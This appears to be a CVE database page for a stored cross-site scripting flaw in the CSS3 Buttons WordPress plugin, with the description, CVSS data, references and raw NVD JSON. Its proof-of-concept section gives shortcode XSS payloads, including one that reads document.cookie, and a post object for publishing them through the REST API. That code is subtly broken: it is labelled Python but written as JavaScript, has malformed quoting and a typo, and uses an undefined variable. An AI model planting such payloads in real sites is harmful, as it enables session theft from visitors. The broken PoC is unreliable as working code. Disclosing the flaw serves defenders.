CVE-2025-13907

Description

The CSS3 Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CSS3 Buttons plugin for WordPress <= 0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-13907 PoC - CSS3 Buttons Stored XSS
// This is for educational and security testing purposes only

// Malicious shortcode payload to inject XSS
const payload = "[button href='"' onmouseover='alert(document.cookie)' tyle='x:expression(alert(1))']Malicious Button[/button]";

// Or using JavaScript protocol handler
const payload2 = "[button href='javascript:alert(String.fromCharCode(88,83,83))']Click Me[/button]";

// Example of how to exploit via WordPress REST API
const exploitData = {
    title: 'XSS Exploit Post',
    content: payload,
    status: 'publish',
    author: contributorUserId
};

// The injected script will execute when any user views the page containing the button
// This can lead to session hijacking, credential theft, or further attacks

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13907
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13907
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13907/
[4] VulDB https://vuldb.com/cve/CVE-2025-13907
[5] https://plugins.trac.wordpress.org/browser/css3-buttons/tags/0.1/css3-buttons.php#L59
[6] https://plugins.trac.wordpress.org/browser/css3-buttons/trunk/css3-buttons.php#L59
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/c1f71ffb-f09c-40f6-b65e-af30ce155466?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13907", "sourceIdentifier": "[email protected]", "published": "2025-12-06T06:15:53.727", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CSS3 Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/css3-buttons/tags/0.1/css3-buttons.php#L59", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/css3-buttons/trunk/css3-buttons.php#L59", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c1f71ffb-f09c-40f6-b65e-af30ce155466?source=cve", "source": "[email protected]"}]}}